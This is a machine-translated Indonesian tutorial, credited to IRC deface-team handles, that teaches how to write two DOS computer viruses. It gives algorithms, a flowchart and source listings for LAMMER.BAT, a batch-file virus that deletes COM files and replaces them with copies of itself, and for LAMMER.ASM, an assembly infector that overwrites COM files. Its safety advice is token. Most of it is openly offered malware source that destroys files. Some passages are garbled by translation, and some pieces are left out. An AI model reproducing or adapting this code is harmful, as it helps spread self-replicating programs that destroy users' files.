Pemerograman Computer Viruses Part I

Dedication: For Knowledgement & Open Source
               Greetz: # DEFACE-TEAM@IRC.DAL.NET
               # DHEGLENG@IRC.DAL.NET Attention.
The program below can infect the system, but with a quick way to know. The following are suggestions which should always be noticed at the time of experiment with the virus:
1. Work only on the backup file (backup). 2. Prevent do not get viruses - viruses or programs that have been infected do not hands of other people (infected). 3. After the experiment, eliminate all programs - programs that have been infected. 4. Hard disk should be protected against unexpected writing, with using DOS instructions, ASSIGN.
   Type the following instructions behind the DOS prompt: A> assign c = a (master DOS diskette in drive A)
In this way, all actions aimed at the hard disk, is directed to the drive A. This protection is not true - really tight, but it can prevent most viruses - A virus that attacks your hard disk. To get back to normal circumstances, write: "Assign c = c" sementaradisket master DOS in drive A. If the above requirement complied when you work with a virus program, then there would be no danger of transmission Non-intentional transmission.
------------------------------------ 1. COMPUTER VIRUS IN BATCHFILE ------------------------------------
As early in the study of programming a computer virus, the following will be displayed computer viruses in this batchfile.Virus utilize the facilities of the DOS, with call instruction - instruction internal and external files. Instruction - the instruction file internal (the instructions are "the inside" of the module where the operating system module could be transferred to memori-internal/RAM at boot time) used in accordance with batchfile.Untuk-law instruction in the instruction - the instruction of external files such as DEBUG and EDLIN, had provided the files that this virus also diperlukan.Disamping use direction for the selection of input and output operations in the PC-DOS (I / O redirection). Viruses in only attack files - files that have a COM. As we all know that a virus has 5 abilities, namely:
ability to obtain information, the ability to check the program, the ability to multiply and transmit, the ability to hide themselves. Of the five pieces are only 2 skills ability possessed by the virus batchfile that I will discuss here, namely the ability obtain information and the ability to multiply and infect other files. Nevertheless, this virus has been able to work because the two abilities are nucleus from a computer virus, while others merely Traffic additional. When viewed from the type, then this bacthfile virus is a virus that is ditularinya riding program. Thus a program which has infected This virus can not be used again, because it has been damaged by a virus.
------------------------------------ 2. ALGORITHM ------------------------------------
Suppose that the virus was named LAMMER.BAT bacthfile, then LAMMER.BAT must contain isntruksi series is capable of performing activities - activities as follows: 1. Search for COM file first in the directory (if any) 2. Deleting files 3. Copy (copy) files LAMMER.BAT to files with names such as file names that had been removed, but with the extension BAT
Thus, after transmission, the contents of the infected file is exactly the same LAMMER.BAT.Sehingga file invoking the infected file has the same effect by calling the file LAMMER.BAT.
------------------------------------ 3. FLOW CHART ------------------------------------
START | | Create a file that contains the name - the name
            Files that have a COM.
 |
                          | Select the first file name
            (Eg named KORBAN.COM) |
 | Create a new Batchfile that contains instructions:
DEL KORBAN.COM COPY \ LAMMER.BAT KORBAN.BAT
 | |
        Call / run the new bacthfile | | END

------------------------------------ 4. Program Listings ------------------------------------
Batchfile below is an implementation of the flow chart above.
FILE NAME: LAMMER.BAT
Echo off - output to the screen was blocked, so that the work performed by the batchfile not visible by the user
         Ctty nul - input and output changed its direction to the NUL-device
Dir *. com / w.daftar - The name of all files with the extension. Com in active directory DAFTAR.pilihan written in the file "/ w" will make the date and panjangn files are hidden
Edlin list <\ 1 - EDLIN obtain input from the commands in the instruction file "1" to edit the file LIST
Debug list <\ 2 - DEBUG called LIST and execute commands from file 2, to make bacthfile PERINTAH.BAT
Edlin perintah.bat <\ 3 - Text editor EDLIN call PERINTAH.BAT files and instruction files third
Del list .* - LIST AND DAFTAR.BAK deleted files
Del perintah.bak - File PERINTAH.BAK deleted)
Ctty con - Input and output back to the keyboard and screen, but screen remain empty (echo off)
Commands - File PERINTAH.BAT dipanggil.Bila virus is infecting a file ASSIGN.COM, then PERINTAH.BAT contains the following:
                      DEL ASSIGN.COM
                      COPY \ LAMMER.BAT


3 pieces of the instruction file with the name "1", "2" and "3" (without extensions) are associated with batchfile file: LAMMER.BAT above, as follows:
FILE NAME: 1
1.4 d e
FILE NAME: 2
M100, 10b, f000 E108. "Bat" M100, 10b, f010 E100 "DEL" Mf000, f00b, 104 E10c 2e E110 0D, 0a Mf010, f020, 11f E112 "COPY \ LAMMER.BAT" E12b 0D, 0a RCX 2c nperintah.bat w q





FILE NAME 3:
Sorry third instruction files can not be written in this section because it contains twice Ctrl-Z (hex 1Ah) and I myself already tired wrote it hehehehe knowingly drink herbal blom kuatJ Use your creativity as a programmer
Thus some knowledge of information about computer virus in a file batchfile.Semoga what I say here could be useful to friends - friends who want to understand virus programming techniques and workmanship. And do not forget to stay tuned for my next article.



Computer Virus Pemerograman Part II
Dedication: For Knowledgement & Open Source
               Greetz: # DEFACE-TEAM@IRC.DAL.NET
               # DHEGLENG@IRC.DAL.NET

1. Preliminary
A computer virus that will be discussed below are written in a language assembley.Bila compared with the virus bacthfile, we talked about the viruses that we discussed This now has five abilities like what I've mentioned earlier. The virus is able to find all COM files that exist on the diskette, and examine whether belum.Bila been infected or not, then the virus will menularinya.Routine manipulation This virus has only a display message: "This file has been infected with computer virus!" or "All COM files on the diskette has been contracting a computer virus !!!". Unlike viruses batchfile that produces a new file and need some files to run, the virus which we will discuss later can work alone and does not generate new files, so the ability to hide themselves from this virus better. Like the batchfile virus, the virus below are included type of virus that ditularinya.Dengan riding programs such viruses are harmful.
2. Algorithm
The algorithm used is as follows: 1. Find the first COM file 2. Open and read the file, place it in the buffer (in RAM) 3. By comparing the virus identification and sequence of bytes of the beginning of the program, check whether the file was infected with a virus or not. 4. a) If not, then tulari file by copying the entire program virus to it (ride). Then show the message: "This file has been infected Computer Virus! "
    b) If so, then look for COM files berikutnya.Ulangi step 2. 5. If all COM files have been infected, then show the message: "all files on diskette Com This computer has been infected with a virus! "

3. Programs and Mechanisms of Transmission
The program below is an implementation of the above.
Note: The program of this virus uses macros that are used macro.Definisi instructions contained in the file LAMMER.MAC. klo want to see files macronya send email to Dr `Ponidi@crackdealer.com)
;------------------------------------------------- ----------------------------------- ; LAMMER.ASM ; ; CODE BY: # DEFACE-TEAM@IRC.DAL.NET ; # DHEGLENG@IRC.DAL.NET ; ; Retrieval SYSTEM BY: DR `PONIDI@CRACKDEALER.COM ; ; THIS VIRUS ATTACK AND ALL DAMAGE THE FILE COM. ; BEWARE! ;------------------------------------------------- -----------------------------------

                        IF1
                        INCLUDE LAMMER.MAC
                        EndIf
Code_seg Segment
             ASSUME CS: Code_seg
             ORG 100H Start: jmp done The identity of DB `This file has been infected with computer viruses! $` Warning DB `all COM files in the floppy disk has been infected with the virus`
             DB `Computer !!!$` File_COM `DB` *. com, 0h Nama_file DB 13 DUP (?) Panjang_id equ 45 Panjang_vir equ 445 Attribute equ 20h Open_code equ 2 Total equ 0ffffh DTA DB43 DUP (20h)



Work: Set_DTA DTA
                        Mov ax, 0
                        Find_first file_COM, Attributes Masih_adakah: cmp ax, 0
                         Je Conduct
                         Cmp ax, 2
                         Je Exit
                         Tulis_string warning
                         Jmp Exit Exit: Ke_dos Implement: mov si, offset DTA + 30
                         Pindahkan_string 13, nama_file
                         Buka_file_DTA DTA, Open_code
                         Push bx
                         Baca_file bx, buffer, number of
                         Push ax
                         Mov in, offset buffer + 3
                         Compare Identity-string, panjang_id
                         Cmp bx, 0
                         Je Cari_lainnya
                         Mov si, 100H
                         Pindahkan_string panjang_vir, Buffer
                         Pop ax
                         Pop bx
                         Push ax
                         Tutup_file bx
                         Hapus_file Nama_file
                         Buat_file Nama_file, Attributes
                         Buka_file Nama_file, Open_code
                         Pop ax
                         Tulis_file bx, buffer, ax
                         Tutup_file bx
                         Tulis_string identity
                         Ke_dos
Cari_lainnya: pop ax
                        pop bx
                        Tutup_file bx
                        Find_next
                        Jmp masih_adakah Label Buffer byte Code_seg ENDS
                        END start

4. Explanation
Beginning of the transmission begins when the virus program is run on a floppy disk containing COM.Virus files will initially infect COM files first (in order of the files on the diskette). With this transmission, the file is a source of infection new and original to dihapus.File virus-infected files that have the file size changed. If the file has been infected with it run, then that file can not run function and will only display the message: "This file has been infected with virus computer! ". Previously, the file will infect other COM files. If by chance the file. COM first attacked in the main directory is COMMAND.COM, then every time you make a boot floppy, it will never work and previous virus will infect a COM program that have not infected. Harapa note that this virus may not work well when positioned on a file COM smaller than the size of the original virus program, or too big (Close to or more than FFFF hexadecimal = 64KB) This is because the virus program can not be copied in full or the buffer has beyond the border of CS (Code Segment)






Thus the article can I convey on this occasion, I hope the information I have to say can be useful for knowledge for us all, especially for those who concern virus.Sekian thanks cao